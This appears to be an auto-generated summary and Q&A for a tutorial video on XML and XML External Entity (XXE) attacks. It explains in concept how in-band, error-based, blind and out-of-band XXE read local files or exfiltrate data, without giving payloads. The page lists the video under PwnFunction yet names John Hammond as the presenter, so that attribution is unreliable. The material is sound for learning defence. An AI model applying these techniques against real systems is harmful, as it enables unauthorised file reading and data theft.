XML External Entities (XXE) Explained

PwnFunction

28 Feb 201920:11

Summary

TLDRIn this video, John Hammond explores the intricacies of XML and XML External Entities (XXE). The tutorial begins with an introduction to XML's structure and use cases, such as APIs and configuration files, and then delves into XML's security vulnerabilities. It explains how XXE attacks work, enabling attackers to read local files or make malicious network requests. Various types of XXE, including in-band and out-of-band, are discussed, along with how attackers can exploit XML parsers. The video concludes by highlighting the broader impact of XML security flaws on different applications.

Takeaways

😀 XML stands for Extensible Markup Language and is used for data transportation and storage, unlike HTML, which focuses on data representation.
😀 XML is human-readable and used in a variety of applications, including APIs, UI layouts, configuration files, and RSS feeds.
😀 A well-formed XML document must have one and only one root element, with nested tags having specific syntactic rules.
😀 XML entities act like variables and can store values to be reused throughout an XML document, which helps reduce redundancy.
😀 There are three types of XML entities: general, parameter, and predefined entities, each serving different purposes.
😀 XML external entities (XXE) can fetch values from local files or external sources, making XML vulnerable to attacks like file reading.
😀 XXE attacks can be used to read local files, exfiltrate data, and even exploit external resources over the network.
😀 In-band XXE allows attackers to see the output directly, whereas out-of-band XXE requires an external request to exfiltrate data.
😀 External DTDs allow more flexibility with XML entities, and they can be exploited in XXE attacks to load external data and perform further malicious actions.
😀 Blind XXE attacks occur when the server doesn't return the data directly but can still exfiltrate information through external requests.
😀 XML is a complex and old technology, with varying behavior across different parsers, making it susceptible to various security vulnerabilities, including XXE attacks.

Q & A

What is the main purpose of XML?
-XML (Extensible Markup Language) is primarily used for data transportation and sometimes for storage. Unlike HTML, which is about data representation, XML focuses on structuring and transporting data in a human-readable format.
What is the difference between XML and HTML?
-HTML is focused on data representation, used for displaying data on web pages, whereas XML is focused on data transportation and storage, allowing for the exchange of data between systems in a flexible, structured format.
What are the syntactic rules for a valid XML document?
-A valid XML document must have a single root element, tag names are case-sensitive, and certain special characters like quotes, ampersands, and angle brackets need to be encoded using entities.
What are XML entities and how are they used?
-XML entities act like variables that store values. They are defined in the document type definition (DTD) and can be referenced within the XML document to avoid repetition or handle special characters.
What are the types of XML entities?
-There are three types of XML entities: general entities (simple storage of values), parameter entities (used within DTDs for more flexible structure), and predefined entities (used for special characters like quotes and ampersands).
What is an XML External Entity (XXE) attack?
-XXE is an attack where an attacker exploits XML's ability to fetch external resources (like files or URLs) via entities. This allows them to read sensitive local files or make unauthorized requests.
How can XXE attacks lead to data exfiltration?
-By manipulating external entities, an attacker can instruct the XML parser to fetch local files or external resources, thereby exfiltrating sensitive data such as password files or configuration files.
What is the difference between in-band, error-based, and out-of-band XXE attacks?
-In-band XXE attacks show the output directly to the attacker, error-based attacks rely on error messages to gather information, and out-of-band XXE attacks require external requests to exfiltrate data without displaying output.
How do external DTDs help in XXE attacks?
-External DTDs can bypass XML restrictions, allowing the attacker to load a DTD from an external resource, which may contain entities that enable further exploitation like reading files or making unauthorized requests.
What is the role of CData in bypassing XML parser errors during XXE attacks?
-CData sections allow certain characters to be included in XML without being parsed as markup, enabling the attacker to include potentially breaking characters in a file like `/etc/fstab`, which might otherwise cause parsing errors.